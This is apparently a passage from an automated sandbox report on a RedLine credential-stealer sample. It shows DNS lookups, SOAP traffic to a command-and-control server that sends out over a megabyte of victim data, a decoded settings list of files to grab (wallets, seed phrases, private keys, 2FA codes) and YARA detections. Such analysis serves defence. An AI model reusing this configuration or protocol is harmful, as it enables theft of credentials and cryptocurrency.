                                                                                                                    Feb 23, 2021 17:48:11.405728102 CET53588238.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:12.226628065 CET5756853192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:12.438410044 CET53575688.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.397584915 CET5054053192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:17.455924988 CET53505408.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:19.497724056 CET5436653192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:19.547638893 CET53543668.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:37.766927004 CET5303453192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:37.825889111 CET53530348.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:45.378946066 CET5776253192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:45.441298962 CET53577628.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:46.347553968 CET5543553192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:46.407594919 CET53554358.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:46.972224951 CET5071353192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:47.030848026 CET5613253192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:47.049971104 CET53507138.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:47.090862036 CET53561328.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:47.543883085 CET5898753192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:47.609217882 CET53589878.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:48.130502939 CET5657953192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:48.182009935 CET53565798.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:48.789802074 CET6063353192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:48.865509033 CET53606338.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:49.505683899 CET6129253192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:49.578013897 CET53612928.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:50.520776987 CET6361953192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:50.577980042 CET53636198.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:51.601552963 CET6493853192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:51.661313057 CET53649388.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:52.215003967 CET6194653192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:52.274837971 CET53619468.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:49:03.993792057 CET6491053192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:49:04.057089090 CET53649108.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:49:29.278896093 CET5212353192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:49:29.327621937 CET53521238.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:49:30.800318956 CET5613053192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:49:30.859863997 CET53561308.8.8.8192.168.2.3

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Feb 23, 2021 17:48:10.333668947 CET192.168.2.38.8.8.80xa13aStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                    Feb 23, 2021 17:48:10.396611929 CET192.168.2.38.8.8.80x62beStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                    Feb 23, 2021 17:48:12.226628065 CET192.168.2.38.8.8.80x2b70Standard query (0)whois.iana.orgA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Feb 23, 2021 17:48:10.385305882 CET8.8.8.8192.168.2.30xa13aNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                    Feb 23, 2021 17:48:10.457633972 CET8.8.8.8192.168.2.30x62beNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                    Feb 23, 2021 17:48:12.438410044 CET8.8.8.8192.168.2.30x2b70No error (0)whois.iana.orgianawhois.vip.icann.orgCNAME (Canonical name)IN (0x0001)
                                                                                                                    Feb 23, 2021 17:48:12.438410044 CET8.8.8.8192.168.2.30x2b70No error (0)ianawhois.vip.icann.org192.0.47.59A (IP address)IN (0x0001)

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • 45.14.13.58:3214

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.34971845.14.13.583214C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Feb 23, 2021 17:48:08.775664091 CET1303OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                    SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"
                                                                                                                    Host: 45.14.13.58:3214
                                                                                                                    Content-Length: 136
                                                                                                                    Expect: 100-continue
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Feb 23, 2021 17:48:08.829349041 CET1303INHTTP/1.1 100 Continue
                                                                                                                    Feb 23, 2021 17:48:08.885245085 CET1305INHTTP/1.1 200 OK
                                                                                                                    Content-Length: 3543
                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                    Date: Tue, 23 Feb 2021 16:48:07 GMT
                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 4d 79 4e 61 6d 65 73 70 61 63 65 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 4f 62 6a 65 63 74 31 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 31 3e 3c 61 3a 4f 62 6a 65 63 74 31 30 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 31 30 3e 3c 61 3a 4f 62 6a 65 63 74 31 31 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 6f 63 75 6d 65 6e 74 73 7c 2a 2e 74 78 74 2c 2a 2e 64 6f 63 2a 2c 2a 6b 65 79 2a 2c 2a 77 61 6c 6c 65 74 2a 2c 2a 73 65 65 64 2a 2c 2a 63 6f 69 6e 2a 2c 2a 6d 79 65 74 68 65 72 2a 2c 2a 65 78 6f 64 75 73 2a 2c 2a 6a 61 78 78 2a 2c 2a 62 69 6e 61 6e 63 65 2a 2c 2a 32 66 61 20 63 6f 64 65 2a 2c 2a 70 72 69 76 61 74 65 20 6b 65 79 2a 7c 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 6f 63 75 6d 65 6e 74 73 7c 2a 2e 74 78 74 2c 2a 2e 64 6f 63 2a 2c 2a 6b 65 79 2a 2c 2a 77 61 6c 6c 65 74 2a 2c 2a 73 65 65 64 2a 2c 2a 63 6f 69 6e 2a 2c 2a 6d 79 65 74 68 65 72 2a 2c 2a 65 78 6f 64 75 73 2a 2c 2a 6a 61 78 78 2a 2c 2a 62 69 6e 61 6e 63 65 2a 2c 2a 32 66 61 20 63 6f 64 65 2a 2c 2a 70 72 69 76 61 74 65 20 6b 65 79 2a 7c 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 4f 62 6a 65 63 74 31 31 3e 3c 61 3a 4f 62 6a 65 63 74 31 32 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 31 33 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 35 2e 31 30 32 2e 33 38 2e 31 35 38 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 34 36 2e 32 31 39 2e 32 30 36 2e 31 35 36 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 36 31 2e 32 33 30 2e 39 30 2e 31 35 35 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 30 39 2e 31 37 35 2e 39 37 2e 31 30 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 32 2e 31 38 30 2e 31 37 31 2e 31 31 31 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 39 33 2e 31 32 38 2e 31 30 38 2e 32 35 31 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 38 34 2e 31 37 2e 36 31 2e 38 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 32 2e 38 36 2e 36 36 2e 31 39 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 35 31 2e 31 30 34 2e 31 36 34 2e 31 30 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 35 2e 32 31 32 2e 31 37 31 2e 31 35 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 39 35 2e 32 33 30 2e 31 34 2e 31
                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetSettingsResponse xmlns="http://tempuri.org/"><GetSettingsResult xmlns:a="MyNamespace" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:Object1>true</a:Object1><a:Object10>false</a:Object10><a:Object11 xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%userprofile%\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*,*coin*,*myether*,*exodus*,*jaxx*,*binance*,*2fa code*,*private key*|0</b:string><b:string>%userprofile%\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*,*coin*,*myether*,*exodus*,*jaxx*,*binance*,*2fa code*,*private key*|0</b:string></a:Object11><a:Object12 xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object13 xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>5.102.38.158</b:string><b:string>46.219.206.156</b:string><b:string>161.230.90.155</b:string><b:string>109.175.97.103</b:string><b:string>182.180.171.111</b:string><b:string>193.128.108.251</b:string><b:string>84.17.61.83</b:string><b:string>2.86.66.190</b:string><b:string>51.104.164.100</b:string><b:string>185.212.171.152</b:string><b:string>195.230.14.1


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.2.34972645.14.13.583214C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Feb 23, 2021 17:48:16.793100119 CET1354OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                    SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"
                                                                                                                    Host: 45.14.13.58:3214
                                                                                                                    Content-Length: 1109278
                                                                                                                    Expect: 100-continue
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Feb 23, 2021 17:48:16.846759081 CET1354INHTTP/1.1 100 Continue
                                                                                                                    Feb 23, 2021 17:48:17.541506052 CET2461INHTTP/1.1 200 OK
                                                                                                                    Content-Length: 147
                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                    Date: Tue, 23 Feb 2021 16:48:16 GMT
                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 6e 64 43 6c 69 65 6e 74 49 6e 66 6f 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SendClientInfoResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.2.34972845.14.13.583214C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Feb 23, 2021 17:48:17.602638960 CET2467OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                    SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"
                                                                                                                    Host: 45.14.13.58:3214
                                                                                                                    Content-Length: 1083264
                                                                                                                    Expect: 100-continue
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Feb 23, 2021 17:48:17.655700922 CET2468INHTTP/1.1 100 Continue
                                                                                                                    Feb 23, 2021 17:48:19.115498066 CET3676INHTTP/1.1 200 OK
                                                                                                                    Content-Length: 250
                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                    Date: Tue, 23 Feb 2021 16:48:17 GMT
                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 54 61 73 6b 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 54 61 73 6b 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 4d 79 4e 61 6d 65 73 70 61 63 65 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 54 61 73 6b 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetTasksResponse xmlns="http://tempuri.org/"><GetTasksResult xmlns:a="MyNamespace" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetTasksResponse></s:Body></s:Envelope>


                                                                                                                    Code Manipulations

                                                                                                                    Statistics

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Start time:17:47:49
                                                                                                                    Start date:23/02/2021
                                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe'
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:219136 bytes
                                                                                                                    MD5 hash:A6602F490E70A0C9846906944C01B1BA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                    Reputation:low

                                                                                                                    Disassembly

                                                                                                                    Code Analysis

                                                                                                                    Reset < >